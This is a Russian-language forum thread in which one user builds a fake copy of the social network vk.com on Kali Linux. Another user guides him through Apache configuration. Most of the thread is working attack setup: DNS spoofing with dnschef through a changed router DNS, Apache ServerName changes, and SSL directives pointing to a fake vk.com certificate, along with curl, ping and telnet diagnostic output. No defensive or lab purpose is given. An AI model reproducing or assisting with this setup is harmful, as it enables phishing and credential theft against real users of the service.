ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
24.01.2019, 19:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
169390
Репутация:
47
|
|
Сообщение от bot_st
bot_st said:
↑
Это надо вставить или переделать и раскомментировать строчку "#ServerName
www.example.com" ?Да, раскомментируйте строчку ServerName и замените www.example.com на vk.com
и перезагрузите Апач
|
|
|
|
24.01.2019, 22:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
11005
Репутация:
0
|
|
Сообщение от fandor9
fandor9 said:
↑
Да, раскомментируйте строчку ServerName и замените
www.example.com
на vk.com
и перезагрузите Апач Сделал, снова, все сайты открываются, vk.com 'Не удаётся открыть страницу'. Хотя если я ввожу локальный ип кали то фейк открывается. Почему то именно если вводить домен - не работает, а если чисто ип то открывает
|
|
|
|
24.01.2019, 22:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
169390
Репутация:
47
|
|
Сообщение от bot_st
bot_st said:
↑
Сделал, снова, все сайты открываются, vk.com 'Не удаётся открыть страницу'. Хотя если я ввожу локальный ип кали то фейк открывается. Почему то именно если вводить домен - не работает, а если чисто ип то открывает что вам выдаёт
Код:
Code:
curl -vv http://vk.com/
и
Код:
Code:
curl -vv https://vk.com/
?
|
|
|
|
24.01.2019, 23:48
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от bot_st
bot_st said:
↑
# The ServerName directive sets the request scheme, hostname and port that
...
# vim: syntax=apache ts=4 sw=4 sts=4 sr noet А где ?
|
|
|
25.01.2019, 09:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
11005
Репутация:
0
|
|
Сообщение от fandor9
fandor9 said:
↑
что вам выдаёт
Код:
Code:
curl -vv http://vk.com/
и
Код:
Code:
curl -vv https://vk.com/
? curl -vv http://vk.com/ выдаёт скелет страницы фейка, а вот история с https
root@kali:~# curl -vv https://vk.com/
* Trying 192.168.0.103...
* TCP_NODELAY set
* connect to 192.168.0.103 port 443 failed: В соединении отказано
* Failed to connect to vk.com port 443: В соединении отказано
* Closing connection 0
curl: (7) Failed to connect to vk.com port 443: В соединении отказано
как это пофиксить?
|
|
|
|
25.01.2019, 10:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
11005
Репутация:
0
|
|
Это вставить сразу после "*:80" ?
|
|
|
|
25.01.2019, 12:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
11005
Репутация:
0
|
|
Итоги после недавних опытов.
Настройки были таковы:
1)В файле less /etc/apache2/sites-enabled/* раскомментировал и изменил строчку #ServerName www.example.com на ServerName vk.com, а начало файла теперь выглядит так ""
2) Открыл 443 порт командой iptables -I INPUT -p tcp --dport 443 -j ACCEPT, затем командой a2enmod ssl включил модуль ssl, чтобы апач слушал 443 порт
3) Дабы проверить прослушиваемые порты ввёл команду lsof -nP -i, вот результат:
apache2 3722 www-data 4u IPv6 63084 0t0 TCP *:80 (LISTEN)
apache2 3722 www-data 6u IPv6 63088 0t0 TCP *:443 (LISTEN)
4) В роутере поменял ип днс, запустил апач командой service apache2 start, далее запустил днсчеф командой dnschef -i 192.168.0.103 --fakeip 192.168.0.103 --fakedomains vk.com, прослушка траффика пошла, вижу запросы
5) Далее, чтобы убедиться, что все остальные сайты кроме vk.com открываются нормально, а vk.com фейково ввожу команду ping, результаты:
PING google.com (173.194.44.68) 56(84) bytes of data.
64 bytes from 173.194.44.68 (173.194.44.68): icmp_seq=1 ttl=116 time=11.6 ms
PING vk.com (192.168.0.103) 56(84) bytes of data.
64 bytes from kali (192.168.0.103): icmp_seq=1 ttl=64 time=0.030 ms
6)Результаты команды curl -vv https://vk.com/ (пишу только результаты https, потому что http показывает скелет фейка сайта, а он слишком большой для данного поста)
* Trying 192.168.0.103...
* TCP_NODELAY set
* Connected to vk.com (192.168.0.103) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
* CAfile: none
CApath: /etc/ssl/certs
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* error:1408F10B:SSL routines:ssl3_get_record:wrong version number
* Closing connection 0
curl: (35) error:1408F10B:SSL routines:ssl3_get_record:wrong version number
7)Результаты команды telnet 192.168.0.103 80
Trying 192.168.0.103...
Connected to 192.168.0.103.
Escape character is '^]'.
Connection closed by foreign host.
И результат команды 192.168.0.103 443
Trying 192.168.0.103...
Connected to 192.168.0.103.
Escape character is '^]'.
Connection closed by foreign host.
8)Заметил такой факт, что при запуске команды service apache2 status присутствует такая строчка:
kali apachectl[3712]: AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1. Set the 'ServerName' directive globally to suppress this message
9)Тестирую, работает ли фейк, ввожу в адресной строке браузера localhost и 192.168.0.103, фейк открывается
10)Ну и собственно, чищу днс кэш командой /etc/init.d/networking restart (на линукс) и ipconfig /flushdns (на винде) и пробую запустить вк в браузере:
Ошибка при установлении защищённого соединения
При соединении с vk.com произошла ошибка. SSL получило запись, длина которой превышает максимально допустимую. Код ошибки: SSL_ERROR_RX_RECORD_TOO_LONG
Господа, после всей изложенной информации у Вас есть ещё варианты как это пофиксить, прилизать и пригладить для корректной работы? ))) Быть может я ошибся в командах или где то не увидел ошибку, пожайлуста помогите |
|
|
|
25.01.2019, 13:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
169390
Репутация:
47
|
|
Сообщение от bot_st
bot_st said:
↑
Итоги после недавних опытов.
Настройки были таковы:
1)
В файле less /etc/apache2/sites-enabled/* раскомментировал и изменил строчку #ServerName
www.example.com
на ServerName vk.com, а начало файла теперь выглядит так ""
2)
Открыл 443 порт командой iptables -I INPUT -p tcp --dport 443 -j ACCEPT, затем командой a2enmod ssl включил модуль ssl, чтобы апач слушал 443 порт
3)
Дабы проверить прослушиваемые порты ввёл команду lsof -nP -i, вот результат:
apache2 3722 www-data 4u IPv6 63084 0t0 TCP *:80 (LISTEN)
apache2 3722 www-data 6u IPv6 63088 0t0 TCP *:443 (LISTEN)
4)
В роутере поменял ип днс, запустил апач командой service apache2 start, далее запустил днсчеф командой dnschef -i 192.168.0.103 --fakeip 192.168.0.103 --fakedomains vk.com, прослушка траффика пошла, вижу запросы
5)
Далее, чтобы убедиться, что все остальные сайты кроме vk.com открываются нормально, а vk.com фейково ввожу команду ping, результаты:
PING google.com (173.194.44.68) 56(84) bytes of data.
64 bytes from 173.194.44.68 (173.194.44.68): icmp_seq=1 ttl=116 time=11.6 ms
PING vk.com (192.168.0.103) 56(84) bytes of data.
64 bytes from kali (192.168.0.103): icmp_seq=1 ttl=64 time=0.030 ms
6)
Результаты команды curl -vv
https://vk.com/
(пишу только результаты https, потому что http показывает скелет фейка сайта, а он слишком большой для данного поста)
* Trying 192.168.0.103...
* TCP_NODELAY set
* Connected to vk.com (192.168.0.103) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
* CAfile: none
CApath: /etc/ssl/certs
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* error:1408F10B:SSL routines:ssl3_get_record:wrong version number
* Closing connection 0
curl: (35) error:1408F10B:SSL routines:ssl3_get_record:wrong version number
7)
Результаты команды telnet 192.168.0.103 80
Trying 192.168.0.103...
Connected to 192.168.0.103.
Escape character is '^]'.
Connection closed by foreign host.
И результат команды 192.168.0.103 443
Trying 192.168.0.103...
Connected to 192.168.0.103.
Escape character is '^]'.
Connection closed by foreign host.
8)
Заметил такой факт, что при запуске команды service apache2 status присутствует такая строчка:
kali apachectl[3712]: AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1. Set the 'ServerName' directive globally to suppress this message
9)
Тестирую, работает ли фейк, ввожу в адресной строке браузера localhost и 192.168.0.103, фейк открывается
10)
Ну и собственно, чищу днс кэш командой /etc/init.d/net
https://help.ubuntu.ru/wiki/apache2
working restart (на линукс) и ipconfig /flushdns (на винде) и пробую запустить вк в браузере:
Ошибка при установлении защищённого соединения
При соединении с vk.com произошла ошибка. SSL получило запись, длина которой превышает максимально допустимую. Код ошибки: SSL_ERROR_RX_RECORD_TOO_LONG
Господа, после всей изложенной информации у Вас есть ещё варианты как это пофиксить, прилизать и пригладить для корректной работы? ))) Быть может я ошибся в командах или где то не увидел ошибку, пожайлуста помогите Вы сейчас пускаете Апач без SSL на 443 порту, поэтому и вылазит везде ошибка, а вот если зададите http://vk.com:443/ то у вас появится копия vk.com.
Редактируйте файл конфига апача под /etc/apache2/sites-enabled/*
поменяйте снова на
и добавьте в конце после
Код:
Code:
SSLEngine on
SSLCertificateFile /etc/ssl/fake_vk.com.cert # Измените на путь, где лежит ваш фэйковый сертификат
SSLCertificateKeyFile /etc/ssl/fake_vk.com.key # Измените на путь, где лежит ключ к клюху к вашему фейковому сертификату
ServerAdmin root@localhost
ServerName vk.com
DocumentRoot /var/www/html
затем активируйте конфиг
Код:
Code:
service apache2 restart
Ну и посмотрите как минимум https://help.ubuntu.ru/wiki/apache2
|
|
|
|
25.01.2019, 14:47
|
|
Guest
Сообщений: n/a
Провел на форуме:
11005
Репутация:
0
|
|
Сообщение от fandor9
fandor9 said:
↑
Вы сейчас пускаете Апач без SSL на 443 порту, поэтому и вылазит везде ошибка, а вот если зададите
http://vk.com:443/
то у вас появится копия vk.com.
Редактируйте файл конфига апача под /etc/apache2/sites-enabled/*
поменяйте снова на
и добавьте в конце после
Код:
Code:
SSLEngine on
SSLCertificateFile /etc/ssl/fake_vk.com.cert # Измените на путь, где лежит ваш фэйковый сертификат
SSLCertificateKeyFile /etc/ssl/fake_vk.com.key # Измените на путь, где лежит ключ к клюху к вашему фейковому сертификату
ServerAdmin root@localhost
ServerName vk.com
DocumentRoot /var/www/html
затем активируйте конфиг
Код:
Code:
service apache2 restart
Ну и посмотрите как минимум
https://help.ubuntu.ru/wiki/apache2Дело двинулось с мёртвой точки, в этот раз исход был таков:
|
|
|
|
25.01.2019, 15:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
169390
Репутация:
47
|
|
Сообщение от bot_st
bot_st said:
↑
Дело двинулось с мёртвой точки, в этот раз исход был таков: ну теперь дело в сертификате, это уже с апач не связано.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
